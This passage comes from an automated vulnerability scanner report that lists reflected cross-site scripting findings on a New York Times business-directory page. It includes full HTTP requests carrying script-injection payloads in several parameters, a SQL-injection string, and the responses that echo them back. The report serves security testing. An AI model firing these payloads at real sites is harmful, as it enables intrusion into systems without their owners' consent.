125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:23:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91534
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCBSSQAT=CFNKJLNDEDJPKCFLEJKCKICF; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIdsS" value="125-513610,125-514528,125-514558,125-518925,125-534894,125-519626,125-521135,125-521146,125-531280,125-524507a83e2"><script>alert(1)</script>ab00739b2398d4c3e">
...[SNIP]...

4.311. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsS parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsS request parameter is copied into the HTML document as plain text between tags. The payload bba0c<script>alert(1)</script>d5f80794b1a was submitted in the sLsIdsS parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507bba0c<script>alert(1)</script>d5f80794b1a&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:47:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCCQRTDT=PNFPHCHAFMGMOKNIHJOJPBPE; path=/
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507bba0c<script>alert(1)</script>d5f80794b1a&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-
...[SNIP]...

4.312. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsT request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a08d7"><script>alert(1)</script>92793a4b3b65c2861 was submitted in the sLsIdsT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768a08d7"><script>alert(1)</script>92793a4b3b65c2861&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:23:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91441
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADTSTCS=OHIPGLGAAPPGPNKOIIMEAOKE; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIdsT" value="125-524511,125-548214,125-523820,125-561740,125-535592,125-526559,125-561743,125-543364,125-526572,125-535768a08d7"><script>alert(1)</script>92793a4b3b65c2861">
...[SNIP]...

4.313. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsT request parameter is copied into the HTML document as plain text between tags. The payload c3986<script>alert(1)</script>6aded6c09c6 was submitted in the sLsIdsT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768c3986<script>alert(1)</script>6aded6c09c6&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:47:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768c3986<script>alert(1)</script>6aded6c09c6&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-
...[SNIP]...

4.314. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsU parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsU request parameter is copied into the HTML document as plain text between tags. The payload adb06<script>alert(1)</script>a2f9952f884 was submitted in the sLsIdsU parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168adb06<script>alert(1)</script>a2f9952f884&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:48:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACATSTCS=IJOJLAHABKPJCILNCKOHIGIH; path=/
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168adb06<script>alert(1)</script>a2f9952f884&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-
...[SNIP]...

4.315. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsU parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsU request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5815b"><script>alert(1)</script>847c39c5e76916523 was submitted in the sLsIdsU parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c